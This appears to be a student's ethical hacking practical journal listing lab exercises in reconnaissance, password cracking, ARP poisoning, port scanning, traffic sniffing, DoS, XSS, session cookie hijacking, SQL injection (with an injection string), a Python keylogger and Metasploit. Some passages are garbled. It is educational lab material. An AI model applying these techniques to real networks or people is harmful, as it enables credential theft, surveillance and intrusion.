R.D. & S. H. National College & S. W.A.

Science College
Bandra, Mumbai – 400050.

Department of Computer Science

CERTIFICATE

This is to certify that Mr.Aryan Gupta of T.Y.B.Sc(Computer Science) class (VI Semester) bearing Roll

No / University Seat No _____CS21040 / 1108272_ has satisfactorily completed Practical’s, in the

subject of Ethical Hacking a part of B.Sc. in Computer Science Program during the academic year

2023 – 2024.

Date of Certification:

Subject Incharge Co-ordinator,

Department Computer Science
Signature of Examiner
INDEX :-

SR.NO. TITLE DATE SIGN

Google and Whois 11-01-2024
1 Reconnaissance
Password Encryption 18-01-2024
2 and Cracking with
CrypTool and Cain
and Abel
Linux Network 25-01-2024
3 Analysis and ARP
Poisoning
Port Scanning with 02-02-2024
4 NMap
Network Traffic 08-02-2024
5 Capture and DoS
Attack with
Wireshark and
Nemesy
Persistent Cross-Site 16-02-2024
6 Scripting Attack
Session 01-03-2024
7 Impersonation with
Firefox and Tamper
Data
SQL Injection Attack 08-03-2024
8
Creating a Keylogger 22-03-2024
9 with Python
10 Exploiting with 30-03-2024
Metasploit (Kali
Linux)
 PRACTICAL NO.1

AIM: Google and Who.is Reconnaissance

It is the to
techniques in ethical
hacking and
penetration testing Using who.is
where information
aboutOpen
Step1: a target
the WHO.is website
system,
organization, or
individual is
collected using
publicly available
tools and resources.

Step 2: Enter the website name and hit the “Enter button”.
Step 3: Show you information about www.prestashop.com
 PRACTICAL NO. 2

2.1) Use Crypt Tool to encrypt and decrypt passwords using RC4 algorithm.

Tools like CrypTool and Cain & Abel to explore password encryption and cracking provides a valuable
learning experience in understanding the strengths and weaknesses of cryptographic methods and
password security. Below, I outline how you can use these tools in an ethical hacking context to
encrypt and then attempt to crack passwords. This practical is designed for educational purposes to
better understand and improve cybersecurity measures.

Step
1:
 Step 2 : Using RC4.

Encryption using RC4

Decryption
2.2) Use Cain and Abel for cracking Windows account password using Dictionary attack and to decode
wireless network passwords

Click on HASH Calcuator

Enter the password to convert into hash

Paste the value into the field you have converted

e.g(MD5)

Right Click on the hash and select the dictionary attack

Then right click on the file and select (Add to List) and then select the Wordlist
Select all the options and start the dictionary attack
 PRACTICAL NO. 3

3.1) Using TraceRoute, ping, ifconfig, netstat Command

Step 1: Type tracert command and type www.prestashop.com press “Enter”.

Step 2: Ping all the IP addresses

Ifconfig
Netstat
3.2) Perform ARP Poisoning in Windows

Step 2 : Select sniffer on the top.

Step 3 : Next to folder icon click on icon name start/stop sniffer. Select device and click on ok.

Step 4 : Click on “+” icon on the top. Click on ok.

Step 5 : Shows the Connected host.

Step 6 : Select Arp at bottom.

Step 7: Click on “+” icon at the top.

Step 8 : Click on start/stop ARP icon on top.
Step 9 : Poisoning the source.

Step 10 : Go to any website on source ip address.

Step 11 : Go to password option in the cain & abel and see the visited site password.
 PRACTICAL NO. 4

AIM : Using Nmap scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL, XMAS.

Port scanning is a fundamental technique in ethical hacking used to determine which ports on a
networked system are open, closed, or filtered. This process helps identify active services and potentially
vulnerable points on a target system. Nmap (Network Mapper) is one of the most popular and powerful
tools used for port scanning and network discovery.

NOTE: Install Nmap for windows and install it. After that open cmd and type “nmap” to check if it is
installed properly. Now type the below commands.

• ACK -sA (TCP ACK scan)

It never determines open (or even open|filtered) ports. It is used to map out firewall rulesets,
determining whether they are stateful or not and which ports are filtered.

Command: nmap -sA -T4 scanme.nmap.org

• SYN (Stealth) Scan (-sS)

SYN scan is the default and most popular scan option for good reason. It can be performed
quickly, scanning thousands of ports per second on a fast network not hampered by intrusive
firewalls.

Command: nmap -p22,113,139 scanme.nmap.org

• FIN Scan (-sF)

 Sets just the TCP FIN bit.

Command: nmap -sF -T4 para

• NULL Scan (-sN)

Does not set any bits (TCP flag header is 0)

Command: nmap –sN –p 22 scanme.nmap.org

• XMAS Scan (-sX)

Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.

Command: nmap -sX -T4 scanme.nmap.org

 PRACTCAL NO. 5
5.1) Use WireShark sniffer to capture network traffic and analyze.
Network traffic capture and analysis, along with testing a network's resilience to Denial of Service (DoS)
attacks, are crucial aspects of ethical hacking. Tools like Wireshark for capturing and analyzing network
traffic, and Nemesy for generating DoS attack simulations, are widely used in the cybersecurity field.

Step 1: Install and open WireShark .

Step 2: Go to Capture tab and select Interface option.

Step 3: In Capture interface, Select Local Area Connection and click on start.
Step 4: The source, Destination and protocols of the packets in the LAN network are displayed.
Step 5: Open a website in a new window and enter the user id and password. Register if needed.
Step 6: Enter the credentials and then sign in.

Step 7: The Wireshark tool will keep recording the packets.

Step 8: Select filter as http to make the search easier and click on apply.

Step 9: Now stop the tool to stop recording.

Step 10: Find the post methods for username and passwords.

Step 11: U will see the email- id and password that you used to log in.

DOS
Using NEMESIS
 PRACTICAL NO. 6
AIM: Simulate persistant Cross Site Scripting attack.

Persistent XSS is a type of security vulnerability found in web applications where the attacker injects
malicious scripts into user input fields, such as text boxes or comment sections, which are then stored on
the server-side and displayed to other users when they visit the affected page. Unlike reflected XSS,
where the injected script is reflected off the web server, persistent XSS persists over time because the
malicious script is permanently stored on the server.
 PRACTICAL NO. 7
AIM: Session impersonation using Firefox and Tamper Data add-on

Session impersonation, also known as session hijacking or session fixation, is a type of cyber attack where
an unauthorized party gains control over a user's session on a web application. In a typical web application
session, a user is assigned a unique identifier, often in the form of a session ID or token, upon
authentication. This identifier is used to track the user's interactions with the application until they log out
or the session expires.

A] Session Impersonation
STEPS
1. Open FireFox
2. Go to Tools > Addons > Extension
3. Search and install EditThisCookie or Cookie Import/Export or any other Cookie tool
4. Then Click on Cookie extension to get cookie
5. Open a Website and Login and then click on export cookie

Logout from the webpage once the cookie got exported

Paste the cookie in the tool which you have exported and click on green tick

And you are in

Tamper DATA add-on

1. Open FireFox
2. Go to Tools > Addons > Extension
3. Search and install Temper Data

Select a website for tempering data e.g(razorba)

Select any item to but

Then Click to add cart
Then Click on tool for tempering Data
Then Start tempering the data

Here you go
 PRACTICAL NO. 8

AIM: Perform SQL injection attack.

SQL injection (SQLi) is a type of cyber attack that targets the vulnerabilities in a web application's
database layer. It occurs when an attacker injects malicious SQL (Structured Query Language) code into
input fields or parameters used by an application to interact with its database. This injected SQL code can
manipulate the database in unintended ways, potentially allowing the attacker to execute unauthorized
SQL queries, retrieve sensitive data, modify or delete database records, and in some cases, take control
of the entire database server.

Step 1 : Open XAMPP and start apache and mysql.

Step 2 : Go to web browser and enter site localhost/phpmyadmin.

Step 3 : Create database with name sql_db.

Step 4 : Go to site localhost/sql_injection/setup.php and click on create/reset

database.

Step 5 : Go to login.php and login using admin and .

Step 6 : Opens the home page.

Step 7 : Go to security setting option in left and set security level low.
Step 8 : Click on SQL injection option in left.
Step 9 : Write "1" in text box and click on submit.

Step 10 : Write "a' or ''='" in text box and click on submit.

Step 11 : Write "1=1" in text box and click on submit.

Step 12 : Write "1*" in text box and click on submit.

 PRACTICAL NO. 9

Aim: - Create a simple keylogger using python Code:

A keylogger is a type of software or hardware device that records every keystroke typed on a computer
keyboard. It can capture keystrokes in real-time and store them locally or transmit them to a remote
location controlled by an attacker.
- -----------------------------------------------------------------------------------
from pynput.keyboard import Key, Listener import
logging
# if no name it gets into an empty string
log_dir = ""
# This is a basic logging function logging.basicConfig(filename=(log_dir+"key_log.txt"),
level=logging.DEBUG,
format='%(asctime)s:%(message)s:') #
This is from the library def
on_press(key):
logging.info(str(key))
# This says, listener is on with Listener(on_press=on_press)
as listener:
listener.join()
Output: -
 PRACTICAL NO. 10

AIM: Using Metasploit to exploit

Metasploit is a comprehensive penetration testing framework used by security professionals, ethical
hackers, and researchers to assess the security of systems, networks, and applications. It offers a wide
range of tools and modules designed to identify, exploit, and mitigate vulnerabilities.

Steps:
Download and open metasploit
Use exploit to attack the host
Create the exploit and add the exploit to the victim’s PC